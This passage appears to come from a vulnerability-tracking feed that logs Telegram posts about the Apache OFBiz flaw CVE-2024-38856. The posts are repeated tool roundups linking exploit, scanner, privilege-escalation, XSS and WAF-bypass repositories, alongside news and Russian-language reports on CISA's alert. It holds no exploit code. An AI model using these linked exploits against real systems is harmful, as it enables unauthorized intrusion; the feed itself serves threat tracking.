Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:57:55.000000Z"}, {"uuid": "8edcd0d2-ff8d-48d3-8889-e05fe6c3bccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/686", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is dicussed in more detail during the Relay Your Heart Away: An OPSEC Concious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:24.000000Z"}, {"uuid": "e2b4374c-8df4-48b3-a29a-718f1aa21116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/YourAnonTl3x/981", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-01T10:57:46.000000Z"}, {"uuid": "64cc179e-bf05-42c4-a3ef-f64682d8aad4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/anonymous_secures/2796", "content": "CISA Warns of CVE-2024-38856 Vulnerability in Apache OFBiz\nThe US Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about an active security vulnerability in the open source enterprise resource management system Apache OFBiz. The vulnerability, tracked as CVE-2024-38856, has been added to CISA's list of known exploited vulnerabilities (KEV). CVE \nhttps://ghostmanews.blogspot.com/2024/09/cisa-warns-of-cve-2024-38856.html", "creation_timestamp": "2024-09-09T16:20:36.000000Z"}, {"uuid": "da73a949-9647-448b-84d7-8056a0e55dae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "exploited", "source": "https://t.me/KomunitiSiber/2475", "content": "CISA Flags Critical Apache OFBiz Flaw Amid Active Exploitation Reports\nhttps://thehackernews.com/2024/08/cisa-flags-critical-apache-ofbiz-flaw.html\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw affecting the Apache OFBiz open-source enterprise resource planning (ERP) system to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.\nThe vulnerability, known as CVE-2024-38856, carries a CVSS score of 9.8, indicating critical severity.", "creation_timestamp": "2024-08-28T12:39:46.000000Z"}, {"uuid": "0ff588cf-7c19-4665-909e-e8f70133fa47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8613", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is dicussed in more detail during the Relay Your Heart Away: An OPSEC Concious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:29.000000Z"}, {"uuid": "0ce09e11-eb94-4b81-8ed9-42bd61d15ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3680", "content": "Tools\u00a0 - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:58:01.000000Z"}, {"uuid": "aad4c7f0-585c-469f-950e-b568c7faac33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/23482", "content": "Tools  - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-22T12:10:27.000000Z"}, {"uuid": "131f48a3-0750-4e6a-b660-6174ded6d45c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3674", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is dicussed in more detail during the Relay Your Heart Away: An OPSEC Concious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:37.000000Z"}, {"uuid": "1190f1a7-7ad8-4cca-99fb-3684928a1b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2213", "content": "Apache OfBiz vulns \n*\n\u041f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440: POC\u043e\u0432, RCE\u0451\u0432, CURL\u043e\u0432, Burp\u0441\u044c\u044e\u0442\u043e\u0432\n(CVE-2024-32113 CVE-2024-36104 CVE-2024-38856)\n*\n// lInK*/\n\n#apache", "creation_timestamp": "2024-08-06T16:34:23.000000Z"}, {"uuid": "a27cec0d-6725-47af-8aa4-a4dfb81c4e15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7313", "content": "Tools\u00a0 - Hackers Factory \n\nSharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them. If you are a low-privileged service user, you can even use it to upgrade to \"NT AUTHORITY\\SYSTEM\" privileges, and you can switch to the target user's desktop to do more without the target user's password.\n\nhttps://github.com/BeichenDream/SharpToken\n\nCVE-2024-7928 POC for CVE-2024-7928. Will attempt to retrieve DB details for FastAdmin instances.\n\nhttps://github.com/bigb0x/CVE-2024-7928\n\nTunnel TCP connections through a file.\n\nhttps://github.com/fiddyschmitt/File-Tunnel\n\nFor Ethical Usage only, Any harmful or malicious activities are not allowed. And it's your own responsibility.\n\nCVE-2024-38856: Apache OFBiz remote code execution Scanner & Exploit\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\ntoxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).\n\nhttps://github.com/t3l3machus/toxssin\n\nWapiti - Web Vulnerability Scanner\n\nhttps://github.com/wapiti-scanner/wapiti\n\nWhatWaf\n\nDetect and bypass web application firewalls and protection systems \n\nhttps://github.com/Ekultek/WhatWaf\n\nThe Web Application Firewall Fingerprinting Tool\n\nhttps://github.com/EnableSecurity/wafw00f\n\n#CyberDilara #CyberBulletin #HackersFactory\n\nhttps://t.me/dilagrafie\nhttps://t.me/CyberDilara\nhttps://t.me/CyberBulletin", "creation_timestamp": "2024-08-21T04:58:22.000000Z"}, {"uuid": "a72974e2-a0ae-407a-bab2-13c06bfa2ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "Telegram/l-KCz0w-5IlM_1KOHtVfcugsSu_9n3luhILR9TkCXHwydzY", "content": "", "creation_timestamp": "2024-08-29T08:36:57.000000Z"}, {"uuid": "705427b1-8deb-4e90-b508-db933a4ed168", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7291", "content": "Tools - Hackers Factory \n\nTools from the DEFCON 32 talk \"SHIM me what you got - Manipulating Shim and Office for Code Injection\"\n\nhttps://github.com/deepinstinct/ShimMe\n\nGitHub - exploits-forsale/collateral-damage: Kernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nAPKscan: Scan for secrets, endpoints, API keys, tokens, credentials in Android apps\n\nhttps://github.com/LucasFaudman/apkscan\n\n3 ways to get Remote Code Execution in Kafka UI\n\nhttps://github.blog/2024-07-22-3-ways-to-get-remote-code-execution-in-kafka-ui/\n\nGitHub - mqst/gouge: Gouge is a simple Burp extension to extract or gouge all URLs which are seen in JS files as you visit different websites/webpages in Burp Suite\n\nhttps://github.com/mqst/gouge\n\nGitHub - two06/CerealKiller: .NET deserialization hunter\n\nhttps://github.com/two06/CerealKiller\n\nGitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n\nhttps://github.com/securelayer7/CVE-2024-38856_Scanner\n\nA technique to unbind and rebind 445/tcp on Windows without loading a driver, loading a module into LSASS, or rebooting the target machine. Implemented to ease the burden of SMB-based NTLM relays while operating over C2. Technical analysis of the technique is dicussed in more detail during the Relay Your Heart Away: An OPSEC Concious Approach to 445 Takeover presentation at x33fcon.\n\nhttps://github.com/zyn3rgy/smbtakeover\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-16T02:26:29.000000Z"}, {"uuid": "e39e5d85-0a58-4955-b34f-eb87de9ea564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "seen", "source": "https://t.me/true_secator/6065", "content": "\u0412 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 ERP \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c Apache OFBiz \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0434\u043e \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430\u0445.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a\u00a0CVE-2024-38856 \u0438 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,8 \u0438\u0437 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0445 10,0, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Apache OFBiz \u0434\u043e 18.12.15.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 SonicWall, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u044b\u0447\u043d\u043e \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u0432\u0445\u043e\u0434\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0447\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u0434\u043b\u044f RCE.\n\n\u041a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, CVE-2024-38856 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0439 CVE-2024-36104, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0438\u044e\u043d\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c 18.12.14.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 \u043f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u043c \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0442\u043e\u0447\u043a\u0430\u043c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438\u00a018.12.15\u00a0\u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0435\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 OFBiz \u0443\u0436\u0435 \u0431\u0435\u0437 \u0442\u043e\u0433\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043f\u043e\u043b\u0435 \u0437\u0440\u0435\u043d\u0438\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Mirai, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e CVE-2024-32113.", "creation_timestamp": "2024-08-07T11:58:50.000000Z"}, {"uuid": "8d6c92bc-e6b0-49ef-869e-47a9bb92438a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/rebooornsTacyyyy/76848", "content": "https://github.com/ThatNotEasy/CVE-2024-38856", "creation_timestamp": "2024-08-10T15:59:03.000000Z"}, {"uuid": "2fa907f5-262d-4a46-8ea7-72a2d958e00f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3027", "content": "https://github.com/securelayer7/CVE-2024-38856_Scanner\n\nApache OFBiz RCE Scanner & Exploit (CVE-2024-38856)\n#github", "creation_timestamp": "2024-08-19T14:57:28.000000Z"}, {"uuid": "6e10ec52-b2a8-429c-8692-c4bc3fe3cf97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38856", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/6146", "content": "\u0412\u043a\u0440\u0430\u0442\u0446\u0435 \u043f\u043e \u0434\u0440\u0443\u0433\u0438\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-6386 (CVSS: 9,9) \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 WPML \u0434\u0435\u043b\u0430\u0435\u0442 \u0441\u0430\u0439\u0442\u044b WordPress \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 \u0434\u043e 4.6.13, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 20 \u0430\u0432\u0433\u0443\u0441\u0442\u0430 2024 \u0433\u043e\u0434\u0430.\n\nWPML - \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u043f\u043b\u0430\u0433\u0438\u043d, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043c\u043d\u043e\u0433\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0441\u0430\u0439\u0442\u043e\u0432 WordPress c \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u043a.\n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c Stealthcopter \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u043e\u043c \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0445 \u043a\u043e\u0434\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0432\u0441\u0442\u0430\u0432\u043a\u0438 \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430 \u043f\u043e\u0441\u0442\u043e\u0432: \u0430\u0443\u0434\u0438\u043e, \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 